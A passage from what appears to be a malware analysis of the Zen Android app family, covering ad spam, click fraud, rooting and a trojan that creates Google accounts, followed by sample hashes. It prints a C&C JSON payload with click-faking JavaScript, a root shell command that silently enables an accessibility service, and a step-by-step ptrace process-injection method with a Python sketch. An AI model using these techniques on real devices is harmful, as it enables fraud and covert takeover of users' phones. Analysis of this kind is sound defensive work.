This approach allows the authors to combine ads from third-party advertising networks with ads they created for their own apps. It may even allow them to sell ad space directly to application developers. The advertisement SDK also collects statistics about clicks and impressions to make it easier to track revenue. Selling the ad traffic directly or displaying ads from other sources in a very large volume can provide direct profit to the app author from the advertisers.
We have seen two types of apps that use this custom-made SDK. The first are games of very low quality that mimic the experience of popular mobile games. While the counterfeit games claim to provide similar functionality to the popular apps, they are simply used to display ads through a custom advertisement SDK.
The second type of apps reveals an evolution in the author's tactics. Instead of implementing very basic gameplay, the authors pirated and repackaged the original game in their app and bundled with it their advertisement SDK. The only noticeable difference is the game has more ads, including ads on the very first screen.
In all cases, the ads are used to convince users to install other apps from different developer accounts, but written by the same group. Those apps use the same techniques to monetize their actions.
Click fraud apps
The authors' tactics evolved from advertisement spam to real PHA (click fraud). Click fraud PHAs simulate user clicks on ads instead of simply displaying ads and waiting for users to click them. This allows the PHA authors to monetize their apps more effectively than through regular advertising. This behavior negatively impacts advertisement networks and their clients because advertising budget is spent without acquiring real customers, and impacts user experience by consuming data plan resources.
The click fraud PHA requests a URL to the advertising network directly instead of proxying it through an additional SDK. The command & control server (C&C server) returns the URL to click along with a very long list of additional parameters in JSON format. After rendering the ad on the screen, the app tries to identify the part of the advertisement website to click. If that part is found, the app loads Javascript snippets from the JSON parameters to click a button or other HTML element, simulating a real user click. Because a user interacting with an ad often leads to a higher chance of the user purchasing something, ad networks often "pay per click" to developers who host their ads. Therefore, by simulating fraudulent clicks, these developers are making money without requiring a user to click on an advertisement.
This example code shows a JSON reply returned by the C&C server. It has been shortened for brevity.
{
  "data": [{
    "id": "107",
    "url": "<ayud_url>",
    "click_type": "2",
    "keywords_js": [{
      "keyword": "<a class=\"show_hide btnnext\"",
      "js": "javascript:window:document.getElementsByClassName(\"show_hide btnnext\")[0].click();"
    }, {
      "keyword": "value=\"Subscribe\" id=\"sub-click\"",
      "js": "javascript:window:document.getElementById(\"sub-click\").click();"
    }]
  }]
}
Based on this JSON reply, the app looks for an HTML snippet that corresponds to the active element (show_hide btnnext) and, if found, the Javascript snippet tries to perform a click() method on it.
Rooting trojans
The Zen authors have also created a rooting trojan. Using a publicly available rooting framework, the PHA attempts to root devices and gain persistence on them by reinstalling itself on the system partition of the rooted device. Installing apps on the system partition makes it harder for the user to remove the app.
This technique only works for unpatched devices running Android 4.3 or lower. Devices running Android 4.4 and higher are protected by Verified Boot.
Zen's rooting trojan apps target a specific device model with a very specific system image. After achieving root access, the app tries to replace the framework.jar file on the system partition. Replacing framework.jar allows the app to intercept and modify the behavior of the Android standard API. In particular, these apps try to add an additional method called statistics() into the Activity class. When inserted, this method runs every time any Activity object in any Android app is created. This happens all the time in regular Android apps, as Activity is one of the fundamental Android UI elements. The only purpose of this method is to connect to the C&C server.
The Zen trojan
After achieving persistence, the trojan downloads additional payloads, including another trojan called Zen. Zen requires root to work correctly on the Android operating system.
The Zen trojan uses its root privileges to turn on accessibility service (a service used to allow Android users with disabilities to use their devices) for itself by writing to a system-wide setting value enabled_accessibility_services. Zen doesn't even check for the root privilege: it just assumes it has it. This leads us to believe that Zen is just part of a larger infection chain. The trojan implements three accessibility services directed at different Android API levels and uses these accessibility services, chosen by checking the operating system version, to create new Google accounts. This is done by opening the Google account creation process and parsing the current view. The app then clicks the appropriate buttons, scrollbars, and other UI elements to go through account sign-up without user intervention.
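A sketch of that setting write (the service component name is invented; on a rooted device, writing the value directly is equivalent to running this shell command as root):

import subprocess

# Zen's own accessibility service, enabled with no user interaction by
# writing the system-wide secure setting (component name is invented)
SERVICE = "com.example.zen/.ZenAccessibilityService"

subprocess.run([
    "su", "-c",
    f"settings put secure enabled_accessibility_services {SERVICE}",
])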
During the account sign-up process, Google may flag the account creation attempt as suspicious and prompt the app to solve a CAPTCHA. To get around this, the app then uses its root privilege to inject code into the Setup Wizard, extract the CAPTCHA image, and send it to a remote server to try to solve the CAPTCHA. It is unclear if the remote server is capable of solving the CAPTCHA image automatically or if this is done manually by a human in the background. After the server returns the solution, the app enters it into the appropriate text field to complete the CAPTCHA challenge.
The Zen trojan does not implement any kind of obfuscation except for one string that is encoded using Base64 encoding. It's one of the strings - "How you'll sign in" - that it looks for during the account creation process. The code snippet below shows part of the screen parsing process.
if (!title.containsKey("Enter the code")) {
    if (!title.containsKey("Basic information")) {
        if (!title.containsKey(new String(android.util.Base64.decode("SG93IHlvdeKAmWxsIHNpZ24gaW4=".getBytes(), 0)))) {
            if (!title.containsKey("Create password")) {
                if (!title.containsKey("Add phone number")) {
Apart from injecting code to read the CAPTCHA, the app also injects its own code into the system_server process, which requires root privileges. This indicates that the app tries to hide itself from any anti-PHA systems that look for a specific app process name or does not have the ability to scan the memory of the system_server process.
The app also creates hooks to prevent the phone from rebooting or going to sleep and to stop the user from pressing hardware buttons during the account creation process. These hooks are created using the root access and custom native code called Lmt_INJECT, although the algorithm for this is well known.
First, the app has to turn off SELinux protection. Then the app finds a process id value for the process it wants to inject with code. This is done using a series of syscalls as outlined below. The "source process" refers to the Zen trojan running as root, while the "target process" refers to the process to which the code is injected and [pid] refers to the target process pid value.
  1. The source process checks the mapping between a process id and a process name. This is done by reading the /proc/[pid]/cmdline file.
    This very first step fails in Android 7.0 and higher, even with root permission. The /proc filesystem is now mounted with the hidepid=2 parameter, which means that a process cannot access another process's /proc/[pid] directory.
  2. A ptrace_attach syscall is called. This allows the source process to trace the target.
  3. The source process looks at its own memory to calculate the offset between the beginning of the libc library and the mmap address.
  4. The source process reads /proc/[pid]/maps to find where libc is located in the target process memory. By adding the previously calculated offset, it can get the address of the mmap function in the target process memory.
  5. The source process tries to determine the location of dlopen, dlsym, and dlclose functions in the target process. It uses the same technique as it used to determine the offset to the mmap function.
  6. The source process writes the native shellcode into the memory region allocated by mmap. Additionally, it also writes addresses of dlopen, dlsym, and dlclose into the same region, so that they can be used by the shellcode. Shellcode simply uses dlopen to open a .so file within the target process and then dlsym to find a symbol in that file and run it.
  7. The source process changes the registers in the target process so that the PC register points directly to the shellcode. This is done using the ptrace syscall.
This diagram illustrates the whole process.
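As a rough illustration, here is how steps 3 through 5 can be expressed (Python for illustration only; Lmt_INJECT does the equivalent in native code):

import ctypes

def lib_base(pid, libname: str) -> int:
    # where is libname mapped in a given process? (/proc/[pid]/maps, steps 3-4)
    with open(f"/proc/{pid}/maps") as maps:
        for line in maps:
            if libname in line:
                return int(line.split("-")[0], 16)
    raise LookupError(f"{libname} not mapped in process {pid}")

def remote_mmap_addr(target_pid: int) -> int:
    libc = ctypes.CDLL("libc.so.6")
    local_mmap = ctypes.cast(libc.mmap, ctypes.c_void_p).value
    offset = local_mmap - lib_base("self", "libc")  # step 3: offset inside libc
    return lib_base(target_pid, "libc") + offset    # step 5: remote base + offset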

Summary
PHA authors go to great lengths to come up with increasingly clever ways to monetize their apps.
Zen family PHA authors exhibit a wide range of techniques, from simply inserting an advertising SDK to a sophisticated trojan. The app that resulted in the largest number of affected users was the click fraud version, which was installed over 170,000 times at its peak in February 2018. The most affected countries were India, Brazil, and Indonesia. In most cases, these click fraud apps were uninstalled by the users, probably due to the low quality of the apps.
If Google Play Protect detects one of these apps, it will show a warning to users.
We are constantly on the lookout for new threats and we are expanding our protections. Every device with Google Play includes Google Play Protect and all apps on Google Play are automatically and periodically scanned by our solutions.
You can check the status of Google Play Protect on your device:
  1. Open your Android device's Google Play Store app.
  2. Tap Menu > Play Protect.
  3. Look for information about the status of your device.

Hashes of samples

Custom ads
  Package name: com.targetshoot.zombieapocalypse.sniper.zombieshootinggame
  SHA256 digest: 5d98d8a7a012a858f0fa4cf8d2ed3d5a82937b1a98ea2703d440307c63c6c928
Click fraud
  Package name: com.counterterrorist.cs.elite.combat.shootinggame
  SHA256 digest: 84672fb2f228ec749d3c3c1cb168a1c31f544970fd29136bea2a5b2cefac6d04
Rooting trojan
  Package name: com.android.world.news
  SHA256 digest: bd233c1f5c477b0cc15d7f84392dab3a7a598243efa3154304327ff4580ae213
Zen trojan
  Package name: com.lmt.register
  SHA256 digest: eb12cd65589cbc6f9d3563576c304273cb6a78072b0c20a155a0951370476d8d